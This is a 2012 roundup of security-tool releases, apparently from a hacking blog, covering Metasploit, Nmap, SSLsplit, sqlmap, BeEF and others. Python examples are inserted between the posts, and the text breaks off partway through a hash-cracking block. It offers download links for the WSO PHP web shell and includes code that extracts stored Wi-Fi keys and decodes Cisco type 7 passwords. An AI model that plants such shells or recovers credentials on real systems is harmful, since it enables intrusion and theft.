Ethical Hacking Software and Security Tools
Metasploit Pro 4.5.0 Release - Penetration Testing Software
Metasploit Pro 4.5.0 delivers completely new capabilities for running full-featured social engineering campaigns as well as significant improvements to the web application scanner. Metasploit Pro users can run sophisticated social engineering campaigns leveraging techniques like phishing and USB drops, watch results in real-time, and present reports containing clear risk analysis and remediation advice for the human attack surface.
Metasploit 4.5.0 includes 95 new exploits, 72 new auxiliary modules, and 13 new post modules over the 4.4.0 release, for a grand total of 180 new modules, all of which are detailed below. In addition, 56 reported bugs were resolved between 4.4.0 and 4.5.0.
Modules that are new since the 2012112801 update (the last update in the 4.4.0 line) include modules targeting the Tectia SSH server, Metasploit, Nessus, Eaton NSM, Nexpose, Microsoft Windows, SIP, Adobe InDesign, Apple QuickTime, BlazeVideo, and Ektron. They are listed immediately below.
The update for 4.4.0 to 4.5.0 will be published shortly after the release of the 4.5.0 installer, and these release notes will be updated to reflect that update's availability.
https://community.rapid7.com/docs/DOC-2108
WiFi Password Decryptor version 1.0 - Free Wireless account password cracking software
The SecurityXploded team has released WiFi Password Decryptor, a free tool that instantly recovers wireless account passwords stored on your system.
It automatically recovers all types of wireless keys/passwords (WEP, WPA, WPA2, etc.) stored by the Windows Wireless Configuration Manager.
After a successful recovery you can save the password list to an HTML, XML or text file. You can also right-click on any of the displayed accounts to quickly copy the password.
Under the hood, WiFi Password Decryptor uses the system service method (instead of injecting into LSASS.exe) to decrypt the WiFi passwords. This makes it safer and more reliable, and allows a single EXE to work on both 32-bit and 64-bit platforms.
It has been successfully tested on Windows Vista and later, including Windows 8.
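As an added example (not from SecurityXploded), the check a Windows administrator can run to see the same stored keys with built-in tooling: `netsh wlan show profiles` lists the saved profiles and `netsh wlan show profile name="<ssid>" key=clear` prints the key in the "Key Content" field. These profiles are readable by any local administrator, which is the real security point behind a tool like this. The parser below pulls the credential out of such output; the sample output is constructed from memory of the netsh layout and every value in it is made up.

```python
import re

# Constructed sample of what `netsh wlan show profile name="HomeNet" key=clear`
# prints on Windows 7/8. Layout reproduced from memory; values are invented.
SAMPLE_NETSH_OUTPUT = """
Profile HomeNet on interface Wi-Fi:
=======================================================================

Applied: All User Profile

Profile information
-------------------
    Version                : 1
    Type                   : Wireless LAN
    Name                   : HomeNet
    Control options        :
        Connection mode    : Connect automatically
        Network broadcast  : Connect only if this network is broadcasting

Connectivity settings
---------------------
    Number of SSIDs        : 1
    SSID name              : "HomeNet"
    Network type           : Infrastructure
    Radio type             : [ Any Radio Type ]

Security settings
-----------------
    Authentication         : WPA2-Personal
    Cipher                 : CCMP
    Security key           : Present
    Key Content            : hunter2-correct-horse
"""

# Indented "Label : value" lines; section headers and banners are not indented.
_KV = re.compile(r"^\s+([A-Za-z][A-Za-z ]*?)\s*:\s?(.*)$")


def parse_netsh_profile(text):
    """Flatten the indented 'Label : value' lines of one profile into a dict."""
    fields = {}
    for line in text.splitlines():
        m = _KV.match(line)
        if m:
            fields[m.group(1).strip()] = m.group(2).strip()
    return fields


def stored_wifi_credential(text):
    """Return (ssid, authentication, key) for one profile dump.

    The key is only present when the profile was dumped with key=clear and
    the profile actually carries a key ("Security key : Present")."""
    f = parse_netsh_profile(text)
    ssid = f.get("SSID name", f.get("Name", "")).strip('"')
    key = f.get("Key Content") if f.get("Security key") == "Present" else None
    return ssid, f.get("Authentication"), key


if __name__ == "__main__":
    print(stored_wifi_credential(SAMPLE_NETSH_OUTPUT))
```

On a live system the same parser can be fed the output of `subprocess.run(["netsh", "wlan", "show", "profile", "name=<ssid>", "key=clear"], capture_output=True, text=True).stdout`, one profile at a time.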
Features & Benefits
o Instantly decrypt and recover stored WiFi account passwords
o Recovers all types of wireless keys/passwords (WEP, WPA, WPA2, etc.)
o Simple and elegant GUI makes it easy to use.
o Right-click context menu to quickly copy the password
o Sort feature to arrange the displayed passwords
o Save the recovered WiFi password list to an HTML, XML or text file.
o Integrated installer to assist with local installation and uninstallation.
Download WiFi password decryptor
http://securityxploded.com/download.php#wifipassworddecryptor
Nmap 6.25 released - Free Security Scanner For Network Exploration & Security Audits
Nmap 6.25 contains hundreds of improvements, including 85 new NSE scripts, nearly 1,000 new OS and service detection fingerprints, performance enhancements such as the new kqueue and poll I/O engines, better IPv6 traceroute support, Windows 8 improvements, and much more! It also includes the work of five Google Summer of Code interns who worked full time with Nmap mentors during the summer.
Nmap 6.25 source code and binary packages for Linux, Windows, and Mac are available for free download from:
http://nmap.org/download.html
Here are the most important changes since 6.01:
o Integrated all of your IPv4 OS fingerprint submissions since January
(more than 3,000 of them). Added 373 fingerprints, bringing the new
total to 3,946. Additions include Linux 3.6, Windows 8, Windows
Server 2012, Mac OS X 10.8, and a ton of new WAPs, printers,
routers, and other devices--including our first IP-enabled doorbell!
Many existing fingerprints were improved. [David Fifield]
o Integrated all of your service/version detection fingerprints
submitted since January (more than 1,500)! Our signature
count jumped by more than 400 to 8,645. We now detect 897
protocols, from extremely popular ones like http, ssh, smtp and imap
to the more obscure airdroid, gopher-proxy, and
enemyterritory. [David Fifield]
o Integrated your latest IPv6 OS submissions and corrections. We're
still low on IPv6 fingerprints, so please scan any IPv6 systems you
own or administer and submit them to http://nmap.org/submit/. Both
new fingerprints (if Nmap doesn't find a good match) and corrections
(if Nmap guesses wrong) are useful.
o Enabled support for IPv6 traceroute using UDP, SCTP, and IPProto
(Next Header) probes. [David Fifield]
o Scripts can now return a structured name-value table so that results
are query-able from XML output. Scripts can return a string as
before, or a table, or a table and a string. In this last case, the
table will go to XML output and the string will go to screen output.
See http://nmap.org/book/nse-api.html#nse-structured-output [Daniel
Miller, David Fifield, Patrick Donnelly]
o [Nsock] Added new poll and kqueue I/O engines for improved
performance on Windows and BSD-based systems including Mac OS X.
These are in addition to the epoll engine (used on Linux) and the
classic select engine fallback for other systems. [Henri Doreau]
o [Ncat] Added support for Unix domain sockets. The new -U and
--unixsock options activate this mode. These provide compatibility
with Hobbit's original Netcat. [Tomas Hozza]
o Moved some Windows dependencies, including OpenSSL, libsvn, and the
vcredist files, into a new public Subversion directory
/nmap-mswin32-aux and moved it out of the source tarball. This
reduces the compressed tarball size from 22 MB to 8 MB and similarly
reduces the bandwidth and storage required for an svn checkout.
Folks who build Nmap on Windows will need to check out
/nmap-mswin32-aux along with /nmap as described at
http://nmap.org/book/inst-windows.html#inst-win-source.
o Many of the great features in this release were created by college
and grad students generously sponsored by Google's Summer of Code
program. Thanks, Google Open Source Department! This year's team
of five developers is introduced at
http://seclists.org/nmap-dev/2012/q2/204 and their successes
documented at http://seclists.org/nmap-dev/2012/q4/138
o [NSE] Replaced old RPC grinder (RPC enumeration, performed as part
of version detection when a port seems to run a SunRPC service) with
a faster and easier to maintain NSE-based implementation. This also
allowed us to remove the crufty old pos_scan scan engine. [Hani
Benhabiles]
o Updated our Nmap Scripting Engine to use Lua 5.2 (and then 5.2.1)
rather than 5.1. See http://seclists.org/nmap-dev/2012/q2/34 for
details. [Patrick Donnelly]
o [NSE] Added 85(!) NSE scripts, bringing the total up to 433.
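An added example, not part of the Nmap release notes, of the structured-output feature described above: the table/elem elements that NSE scripts now emit into the XML output can be walked into plain Python dicts and lists and then queried, here for ports whose ssl-enum-ciphers result lists an RC4 suite. The XML fragment is constructed to follow the Nmap XML layout (script, table and elem elements, where a missing key attribute means a Lua array); the address and the script results are made up.

```python
import xml.etree.ElementTree as ET

# Constructed Nmap XML sample: one script with nested structured output, one
# with a flat keyed table plus a bare elem, and one with string output only.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" version="6.25">
  <host>
    <address addr="192.0.2.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="443">
        <state state="open"/>
        <service name="https"/>
        <script id="ssl-cert" output="Subject: commonName=example.test">
          <table key="subject">
            <elem key="commonName">example.test</elem>
          </table>
          <table key="issuer">
            <elem key="commonName">Example Root CA</elem>
          </table>
          <elem key="sig_algo">sha256WithRSAEncryption</elem>
        </script>
        <script id="ssl-enum-ciphers" output="TLSv1.0: ...">
          <table key="TLSv1.0">
            <table key="ciphers">
              <elem>TLS_RSA_WITH_RC4_128_SHA</elem>
              <elem>TLS_RSA_WITH_AES_128_CBC_SHA</elem>
            </table>
          </table>
        </script>
      </port>
      <port protocol="tcp" portid="22">
        <state state="open"/>
        <service name="ssh"/>
        <script id="banner" output="SSH-2.0-OpenSSH_6.1"/>
      </port>
    </ports>
  </host>
</nmaprun>
"""


def _structured(node):
    """Turn the table/elem children of a <script> or <table> into Python data.

    Children that all carry a key attribute become a dict; children without
    keys become a list (that is how NSE serialises a Lua array). A script
    with no structured children returns None."""
    children = [c for c in node if c.tag in ("table", "elem")]
    if not children:
        return None
    items = []
    for c in children:
        if c.tag == "elem":
            value = (c.text or "").strip()
        else:
            value = _structured(c)
        items.append((c.attrib.get("key"), value))
    if all(k is not None for k, _ in items):
        return dict(items)
    return [v for _, v in items]


def parse_script_results(xml_text):
    """Map (ip, port, script id) -> {"output": screen text, "data": structured}."""
    root = ET.fromstring(xml_text)
    results = {}
    for host in root.iter("host"):
        addr = host.find("address").attrib["addr"]
        for port in host.iter("port"):
            portid = int(port.attrib["portid"])
            for script in port.findall("script"):
                results[(addr, portid, script.attrib["id"])] = {
                    "output": script.attrib.get("output", ""),
                    "data": _structured(script),
                }
    return results


def ports_offering_rc4(results):
    """Query example: every (ip, port, protocol, suite) where RC4 is offered."""
    hits = []
    for (addr, portid, sid), r in results.items():
        if sid != "ssl-enum-ciphers" or not isinstance(r["data"], dict):
            continue
        for proto, detail in r["data"].items():
            if not isinstance(detail, dict):
                continue
            for suite in detail.get("ciphers", []):
                if "RC4" in suite:
                    hits.append((addr, portid, proto, suite))
    return hits


if __name__ == "__main__":
    print(ports_offering_rc4(parse_script_results(SAMPLE_NMAP_XML)))
```

The same walk works on `hostscript` results and on larger scans; only the anchor (host vs port) changes.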
Posted 5th December 2012 by BreakTheSec
ExploitShield Browser Edition 0.8.1 released
Every week, new targeted attacks driven by financial motives, state sponsorship and commercial espionage are discovered. These sophisticated advanced persistent threats use arsenals of weaponized vulnerability exploits to steal confidential information and trade secrets. Organizations remain infected while security companies rush to develop updated signatures for an outdated security model.
ExploitShield protects users where traditional security measures fail. It consists of an innovative patent-pending application shielding technology that prevents malicious exploits from compromising computers through software vulnerabilities.
ExploitShield Browser Edition version 0.8.1 (beta2) has been released; it improves the core engine and adds some basic usability improvements:
o Improved detection of memory exploits
o Improved detection of Java exploits
o Improved prevention of false positives
o Ability to run as a non-administrator user
o Fixes for various bugs and crashes
To install ExploitShield Browser Edition 0.8.1 on top of the previous 0.7 version, simply download the new version and run the installer; it will automatically upgrade the previous version. IMPORTANT: close all your browsers before running the installation.
Posted 1st December 2012 by BreakTheSec
PySQLi - Python framework to exploit complex SQL injection vulnerabilities
PySQLi is a Python framework designed to exploit complex SQL injection vulnerabilities. It provides dedicated building blocks that can be used to build advanced exploits, or easily extended and improved to fit the case at hand.
PySQLi is designed to be easily modified and extended through derived classes, and to inject through various channels such as the command line, custom network protocols and even HTTP forms protected by anti-CSRF tokens.
PySQLi is still at an early stage of development, although it has been under development for more than three years. Many features are still missing from the current version; this will be improved over the coming months and years.
Download PySQLi
https://github.com/sysdream/pysqli/archive/master.zip
Posted 27th November 2012 by BreakTheSec
BeEF version 0.4.3.9-alpha - The Browser Exploitation Framework
BeEF ( Browser Exploitation Framework) is a powerful penetration testing tool that focuses on the web browser.
Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors.
Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.
Download it from here:
https://github.com/beefproject/beef
OWASP Joomscan - Joomla vulnerability scanner identifies 673 vulnerabilities
Joomscan is a penetration testing tool that helps find vulnerabilities in the Joomla CMS. The updated version detects 673 vulnerabilities, covering file inclusion, SQL injection and command execution flaws in a target Joomla! web site.
Download Joomscan: http://sourceforge.net/projects/joomscan/files/joomscan/2012-03-10/joomscan-latest.zip/download
How to use Joomscan? http://www.breakthesecurity.com/2011/11/how-to-use-joomscan-to-find-joomla.html
Posted 27th November 2012 by BreakTheSec
SSLsplit: Tool for man-in-the-middle attacks against SSL/TLS encrypted network connections.
SSLsplit is a tool for man-in-the-middle attacks against SSL/TLS encrypted network connections. Connections are transparently intercepted through a network address translation engine and redirected to SSLsplit. SSLsplit terminates SSL/TLS and initiates a new SSL/TLS connection to the original destination address, while logging all data transmitted. SSLsplit is intended to be useful for network forensics and penetration testing.
SSLsplit supports plain TCP, plain SSL, HTTP and HTTPS connections over both IPv4 and IPv6. For SSL and HTTPS connections, SSLsplit generates and signs forged X509v3 certificates on the fly, based on the original server certificate's subject DN and subjectAltName extension. SSLsplit fully supports Server Name Indication (SNI) and is able to work with RSA, DSA and ECDSA keys and DHE and ECDHE cipher suites. SSLsplit can also use existing certificates for which the private key is available, instead of generating forged ones. SSLsplit can generate NULL-prefix CN certificates (for testing clients that still truncate the common name at a NUL byte) and can deny OCSP requests in a generic way.
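As an added example (not SSLsplit's own code), the hostname check a client should apply to the certificate it receives, including the NUL-prefix case mentioned above. The certificate dicts are constructed stand-ins for the subject CN and SAN dNSNames that real code would take from the parsed X.509 object. One caveat worth stating: because SSLsplit copies the subject and subjectAltName from the genuine certificate, name matching alone will pass; what actually catches the forgery is chain validation against a trust store that does not contain SSLsplit's CA, or pinning of the server's key.

```python
def _match_name(pattern, hostname):
    """RFC 6125-style comparison of one certificate name against a hostname.

    Only a single leftmost wildcard label is honoured, it must not span
    label boundaries, and a name containing a NUL byte is rejected outright
    (a DNS name can never legitimately contain one)."""
    if "\x00" in pattern:
        return False
    pattern = pattern.lower().rstrip(".")
    hostname = hostname.lower().rstrip(".")
    if pattern == hostname:
        return True
    if not pattern.startswith("*."):
        return False
    p_labels = pattern.split(".")
    h_labels = hostname.split(".")
    # The wildcard must leave at least two fixed labels and replaces exactly
    # one label, so *.cdn.example.test matches img.cdn.example.test only.
    if len(p_labels) < 3 or len(p_labels) != len(h_labels):
        return False
    return p_labels[1:] == h_labels[1:] and h_labels[0] != ""


def cert_matches_host(cert, hostname):
    """cert: dict with 'subject_cn' and a list 'san_dns' of dNSName entries.
    The CN is consulted only when the certificate has no dNSName SAN."""
    names = cert.get("san_dns") or []
    if not names:
        names = [cert.get("subject_cn", "")]
    return any(_match_name(n, hostname) for n in names)


def naive_c_style_match(cert, hostname):
    """The flawed check of clients that copied the CN into a C string: the
    comparison stops at the first NUL, so the attacker-chosen prefix decides
    the result. Included only to show why the NULL-prefix option exists."""
    cn = cert.get("subject_cn", "")
    truncated = cn.split("\x00", 1)[0]
    return truncated.lower() == hostname.lower()


# Constructed certificates (illustrative data, not real certificates).
LEGIT = {
    "subject_cn": "www.example.test",
    "san_dns": ["www.example.test", "example.test", "*.cdn.example.test"],
}
# Shape of a NULL-prefix forgery: a CN for a domain the attacker controls
# (so a CA might have issued it) with the victim's name before the NUL.
NUL_FORGED = {"subject_cn": "www.example.test\x00.attacker.test", "san_dns": []}


if __name__ == "__main__":
    print(cert_matches_host(LEGIT, "www.example.test"))
    print(naive_c_style_match(NUL_FORGED, "www.example.test"),
          cert_matches_host(NUL_FORGED, "www.example.test"))
```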
SSLsplit version 0.4.5 was released on 7 November; the changes are:
- Add support for 2048 and 4096 bit Diffie-Hellman.
- Fix syslog error messages (issue #6).
- Fix threading issues in daemon mode (issue #5).
- Fix address family check in netfilter NAT lookup (issue #4).
- Fix build on recent glibc systems (issue #2).
- Minor code and build process improvements.
Download the SSLsplit
https://github.com/droe/sslsplit
Posted 27th November 2012 by BreakTheSec
Burp Suite Free Edition v1.5 released
Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities.
Burp gives you full control, letting you combine advanced manual techniques with state-of-the-art automation, to make your work faster, more effective, and more fun.
Burp Suite contains the following key components:
o An intercepting Proxy, which lets you inspect and modify traffic between your browser and the target application.
o An application-aware Spider, for crawling content and functionality.
o An advanced web application Scanner, for automating the detection of numerous types of vulnerability.
o An Intruder tool, for performing powerful customized attacks to find and exploit unusual vulnerabilities.
o A Repeater tool, for manipulating and resending individual requests.
o A Sequencer tool, for testing the randomness of session tokens.
o The ability to save your work and resume working later.
o Extensibility, allowing you to easily write your own plugins, to perform complex and highly customized tasks within Burp.
This is a significant upgrade with a wealth of new features added since v1.4, most notably:
o Completely new user interface with numerous usability enhancements.
o Several new Proxy listener options, to deal with unusual situations.
o New payload types in Burp Intruder.
o JSON support.
o Support for streaming HTTP responses.
o Support for Android SSL connections (device and emulator).
o Numerous new session handling options.
o Full contextual documentation within the software itself.
Download Burp Suite Free Edition v1.5
http://portswigger.net/burp/download.html
WSO 2.5.1 (PHP web shell) released - download now
WSO is a PHP web shell: a script that provides a web interface for remotely operating the host's operating system and its services/daemons. It is the kind of backdoor attackers drop on a compromised web server, so its feature list is worth knowing from the detection side as well.
Features:
o Cookie-based authorization
o Server information
o File manager (copy, rename, move, delete, chmod, touch, create files and folders)
o View, hex view, edit, download and upload files
o Working with zip archives (packing, unpacking) and tar.gz compression
o Console
o SQL manager (MySQL, PostgreSQL)
o Execute PHP code
o String utilities and hash lookup in online databases
o Bind port and back-connect (Perl)
o Brute force for FTP, MySQL, PgSQL
o Search for files and search for text in files
o Support for *nix-like and Windows systems
o "Antipoiskovik" (anti-search-engine check: if the User-Agent belongs to a search engine crawler, a 404 error is returned so the shell does not get indexed)
o AJAX support
o Small size: the packed version is 22.8 KB
o Selectable character encoding for the shell
Changelog (v2.5.1):
o Removed the comments from the first line.
o Added an option to dump only selected columns of a table.
o Sizes of large files are now reported correctly.
o In the file properties, the "Create time" field was changed to "Change time" (http://php.net/filectime).
o Fixed a bug that broke the MySQL brute force when the server address included a port.
o Fixed a bug that prevented viewing the contents of a table named "download".
Download it from here:
https://github.com/downloads/orbweb/PHP-SHELL-WSO/wso2.5.1.zip
https://github.com/downloads/orbweb/PHP-SHELL-WSO/wso2.5.1.php
jSQL Injection, a Java GUI for database injection
An easy-to-use SQL injection tool for retrieving database information from a remote server.
jSQL Injection features:
o GET, POST, header and cookie injection methods
o visual, error-based and blind injection algorithms
o automatic selection of the best algorithm
o progress display while retrieving data
o proxy settings
Currently supports only MySQL.
Running an injection requires the remote server URL and the name of the parameter to inject into.
Download jSQL Injection
http://code.google.com/p/jsql-injection/downloads/list
Posted 14th August 2012 by BreakTheSec
Download Backtrack 5 R3 , a Penetration testing linux
BackTrack 5 R3 has been released. R3 focuses on bug-fixes as well as the addition of over 60 new tools – several of which were released in BlackHat and Defcon 2012. A whole new tool category was populated – “Physical Exploitation”, which now includes tools such as the Arduino IDE and libraries, as well as the Kautilya Teensy payload collection.
For the insanely impatient, you can download the BackTrack 5 R3 release via torrent right now. Direct ISO downloads will be available once all our HTTP mirrors have synched, which should take a couple more hours. Once this happens, we will update our BackTrack Download page with all links.
o BT5R3-GNOME-64.torrent (md5: 8cd98b693ce542b671edecaed48ab06d)
o BT5R3-GNOME-32.torrent (md5: aafff8ff5b71fdb6fccdded49a6541a0)
o BT5R3-KDE-64.torrent (md5: 981b897b7fdf34fb1431ba84fe93249f)
o BT5R3-KDE-32.torrent (md5: d324687fb891e695089745d461268576)
o BT5R3-GNOME-32-VM.torrent (md5: bca6d3862c661b615a374d7ef61252c5)
Posted 14th August 2012 by BreakTheSec
Portspoof : Service Signature Obfuscator
The portspoof program is designed to enhance OS security by emulating legitimate service signatures on otherwise closed ports. The general goal is to make port scanning very slow and its output very difficult to interpret, thus making the reconnaissance phase of an attack a challenging and bothersome task.
Portspoof features:
o Fast: Multithreaded (by default 10 threads handle new incoming connections).
o Lightweight: Requires small amount of system resources.
o Portable: runs on BSD/Linux (support for OS X/Windows will be added).
o Flexible: You can easily use your firewall rules to define ports that are going to be spoofed.
o Effective against popular port scanners
o By default, portspoof binds to only one port (4444) on all interfaces and is extremely CPU friendly; the firewall rules mentioned above redirect the other ports to it. After running the program and scanning the host with Nmap, you will find that although few ports are really open, many false open ports are reported.
Download
https://github.com/drk1wi/portspoof/zipball/master
Posted 11th August 2012 by BreakTheSec
NOWASP (Mutillidae): application for testing your Web PenTesting and Hacking skills
NOWASP (Mutillidae) is a free, open source web application provided to allow security enthusiasts to pen-test a web application.
NOWASP (Mutillidae) can be installed on Linux, Windows XP, and Windows 7 using XAMPP, making it easy for users who do not want to administer a web server.
It is already installed on Samurai WTF and Rapid7 Metasploitable-2, and the existing version can be updated on either. Containing dozens of vulnerabilities and hints to help the user, it is an easy-to-use web hacking environment deliberately designed for labs, security enthusiasts, classrooms, CTFs, and as a target for vulnerability assessment tools. Mutillidae has been used in graduate security courses, in corporate web security training courses, and as an "assess the assessor" target for vulnerability assessment software.
Instructional videos using NOWASP (Mutillidae) are available on the "webpwnized" YouTube account at https://www.youtube.com/user/webpwnized. Updates on the project and video posts are tweeted to @webpwnized
Download NOWASP
http://sourceforge.net/projects/mutillidae/files/latest/download?source=files
Posted 8th August 2012 by BreakTheSec
Websploit Framework Version 2.0.1 Released
WebSploit is an open source project for scanning and analysing remote systems for vulnerabilities.
WebSploit is an open source project for:
[>]Social engineering attacks
[>]Web scanning, crawling and analysis
[>]Automatic exploitation
[>]Network attacks
----
[+]Autopwn - uses Metasploit to scan and exploit target services
[+]wmap - scans and crawls the target using the Metasploit wmap plugin
[+]format infector - injects reverse and bind payloads into file formats
[+]phpmyadmin Scanner
[+]LFI Bypasser
[+]Apache Users Scanner
[+]Dir Bruter
[+]admin finder
[+]MLITM Attack - Man Left In The Middle, XSS phishing attacks
[+]MITM - Man In The Middle Attack
[+]Java Applet Attack
[+]MFOD Attack Vector
[+]USB Infection Attack
[+]ARP Dos Attack
[+]Web Killer Attack
[+]Fake Update Attack
[+]Fake Access point Attack
Download WebSploit Framework
http://sourceforge.net/projects/websploit/files/latest/download?source=files
Note: the websploit toolkit project was closed and a new project called WebSploit Framework was started.
Posted 8th August 2012 by BreakTheSec
Secunia PSI 3.0 Released : Personal Software Inspector (PSI)
Secunia PSI 3.0 is a free computer security solution that identifies vulnerabilities in non-Microsoft (third-party) programs which can expose PCs to attacks.
Simply put, it is scanning software that identifies programs in need of security updates, helping to protect the data on your PC against cybercriminals. It then supplies your computer with the necessary security updates to keep it safe.
Secunia PSI even automates the updates for your insecure programs, making it much easier to maintain a secure PC. A scanner like Secunia PSI 3.0 complements antivirus software and, as a free program, is well worth running on every home computer.
Download Secunia PSI
http://secunia.com/vulnerability_scanning/personal/
Posted 8th August 2012 by BreakTheSec
Burp Suite, a tool for performing security testing of web applications
Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities.
Burp gives you full control, letting you combine advanced manual techniques with state-of-the-art automation, to make your work faster, more effective, and more fun.
Burp Suite contains the following key components:
o An intercepting proxy, which lets you inspect and modify traffic between your browser and the target application.
o An application-aware spider, for crawling content and functionality.
o An advanced web application scanner, for automating the detection of numerous types of vulnerability.
o An intruder tool, for performing powerful customized attacks to find and exploit unusual vulnerabilities.
o A repeater tool, for manipulating and resending individual requests.
o A sequencer tool, for testing the randomness of session tokens.
o The ability to save your work and resume working later.
o Extensibility, allowing you to easily write your own plugins, to perform complex and highly customized tasks within Burp.
Burp is easy to use and intuitive, allowing new users to begin working right away. Burp is also highly configurable, and contains numerous powerful features to assist the most experienced testers with their work.
Download Burp Suite
http://portswigger.net/burp/download.html
Posted 8th August 2012 by BreakTheSec
GUI for sqlmap : Automated Sql Injection tool
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches ranging from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
Download
http://code.google.com/p/gui-for-sqlmap/downloads/list
Posted 8th August 2012 by BreakTheSec
NinjaWPass for WordPress: protect WordPress login form against keyloggers and stolen passwords
NinjaWPass is a free WordPress plugin written to protect your blog administration console. It makes it considerably harder for an attacker who has stolen your password to log in to your console.
The mechanism is simple but effective, and the same kind of partial-password scheme is used by some large banks to protect their customers' online accounts.
All you need to do is define a second password (the NinjaWPass password) of 10 to 30 characters.
At the WordPress login prompt, besides your current password, you will be asked to enter 3 randomly chosen characters of your NinjaWPass password. Whether your computer is infected by a keylogger or someone is looking over your shoulder, a single observed login reveals only three characters of it, not the whole password.
Additionally, the plugin can send you an email alert whenever someone logs into your WordPress admin interface.
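An added example (not the plugin's code) of how a partial-password challenge of this kind works, together with its two known limitations, which the description leaves out: the server has to read individual characters of the secondary password, so it cannot be stored as a one-way hash the way the primary password is, and every observed login hands a keylogger three more characters, so the scheme buys time rather than immunity. The function names, the challenge size and the sample password are all constructed.

```python
import hmac
import secrets


def make_challenge(secret_len, k=3, rng=None):
    """Choose k distinct 1-based positions of the secondary password, sorted,
    from a CSPRNG so positions cannot be predicted from earlier logins."""
    if secret_len < k:
        raise ValueError("secondary password must be at least %d characters" % k)
    rng = rng or secrets.SystemRandom()
    return sorted(rng.sample(range(1, secret_len + 1), k))


def expected_answer(secret, positions):
    return "".join(secret[p - 1] for p in positions)


def verify_answer(secret, positions, answer):
    """Constant-time comparison so response time does not reveal which
    character was wrong. Note that `secret` must be available in clear here,
    i.e. stored recoverably (encrypted at rest), not hashed."""
    expected = expected_answer(secret, positions).encode("utf-8")
    return hmac.compare_digest(expected, answer.encode("utf-8"))


def keylogger_knowledge(secret_len, observed_logins):
    """Model the attacker the scheme is meant to defeat: a keylogger that saw
    several logins. `observed_logins` is a list of (positions, typed answer)
    pairs. Returns the secret as far as it is known, None for unseen slots."""
    known = [None] * secret_len
    for positions, answer in observed_logins:
        for p, ch in zip(positions, answer):
            known[p - 1] = ch
    return known


def fraction_recovered(known):
    return sum(1 for c in known if c is not None) / len(known)


if __name__ == "__main__":
    secret = "correct horse battery"   # constructed 21-character secondary password
    challenge = make_challenge(len(secret))
    print("challenge positions:", challenge)
    print("verified:", verify_answer(secret, challenge, expected_answer(secret, challenge)))
    seen = [(c, expected_answer(secret, c))
            for c in (make_challenge(len(secret)) for _ in range(10))]
    print("recovered after 10 observed logins: %.0f%%"
          % (100 * fraction_recovered(keylogger_knowledge(len(secret), seen))))
```

Running the demo a few times shows why the login alert matters: after roughly ten observed logins most of a 21-character secret is known to the keylogger.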
Installation :
NinjaWPass can be installed like any other WordPress plugin.
1) Download the plugin to your local computer
2) Log into your WordPress admin console and click on the 'Plugins' menu, then 'Add New' submenu and select 'Upload'.
3) Upload the zip file; the plugin will be installed automatically.
4) Click on the 'Plugins' menu again, then 'Installed Plugins' submenu and activate NinjaWPass.
5) Click on its 'Settings' link and setup your new password.
Afterward, simply log out of WordPress and you will see NinjaWPass nicely integrated into the login form.
Download NinjaWPass
http://sourceforge.net/projects/ninjawpass/files/latest/download?source=files
Posted 8th August 2012 by BreakTheSec
Satori 0.7.4 released : Passive OS fingerprinting TOol
Satori uses WinPcap (almost all recent testing has been done with 4.1.1). The program listens on the wire for all traffic and does OS identification based on what it sees. The main things it works to identify are Windows machines, HP devices (that use the HP Switch Protocol), Cisco devices (that send CDP packets), IP phones (that send Skinny packets), and recently a lot of DHCP-related things, plus some others. It is still early on; many changes will be made and whatever features are requested will be added, so just send them, with packet captures if possible!
Download it from here
http://myweb.cableone.net/xnih/
Posted 8th August 2012 by BreakTheSec
Automated Browser-in-The-Middle attack tool
Browser-in-the-middle is a bash script that uses ettercap, Metasploit and the BeEF framework to inject code into web pages visited by users on the local network.
- uses ettercap to launch a man-in-the-middle attack
- ettercap modifies the traffic so that malicious JavaScript or iframes are added
- the victim's browser is redirected to the attacker's web server
- the web server runs the Metasploit autopwn module or the BeEF framework to launch browser exploits or other browser-related attacks
Download
http://code.google.com/p/browser-in-the-middle/downloads/list
Posted 8th August 2012 by BreakTheSec
Hash Code Cracker v 1.2.1
This password cracker was written in Java and is intended for Pen Testers and Security Professionals.
Features
o Cracks MD5, SHA, NTLM (Windows password) and Cisco type 7 hash codes (Cisco type 7 is a reversible encoding rather than a hash, so it is decoded instead of cracked).
o No installation needed.
o Runs on any platform with a Java runtime.
o Online cracking option (can look the hash up on multiple sites).
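An added example (not the tool's code) of two of the operations listed above: reversing a Cisco type 7 string, which is a fixed-key XOR rather than a hash and so needs no cracking at all, and a dictionary attack on MD5/SHA hashes with the algorithm guessed from the digest length. NTLM is left out on purpose: it is MD4 over the UTF-16LE password and hashlib's MD4 is missing on some OpenSSL builds. The key string and the test vector 094F471A1A0A are the well-known Cisco values; the wordlist is constructed.

```python
import hashlib

# The fixed XOR key Cisco IOS uses for "service password-encryption" (type 7).
CISCO7_KEY = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv"


def cisco7_decode(encoded):
    """Reverse a type 7 string: two decimal digits of seed, then hex bytes that
    were XOR-ed with CISCO7_KEY starting at the seed offset. This is
    obfuscation, not hashing, so it is decoded directly rather than cracked."""
    seed = int(encoded[:2])
    body = bytes.fromhex(encoded[2:])
    return bytes(b ^ CISCO7_KEY[(seed + i) % len(CISCO7_KEY)]
                 for i, b in enumerate(body)).decode("ascii")


def cisco7_encode(plain, seed=9):
    """Forward direction, used here only to round-trip the decoder."""
    body = bytes(ord(c) ^ CISCO7_KEY[(seed + i) % len(CISCO7_KEY)]
                 for i, c in enumerate(plain))
    return "%02d%s" % (seed, body.hex().upper())


# Hash type guessed from hex length. 32 hex digits is ambiguous: NTLM has
# the same length as MD5 and is not attempted here (see the lead-in).
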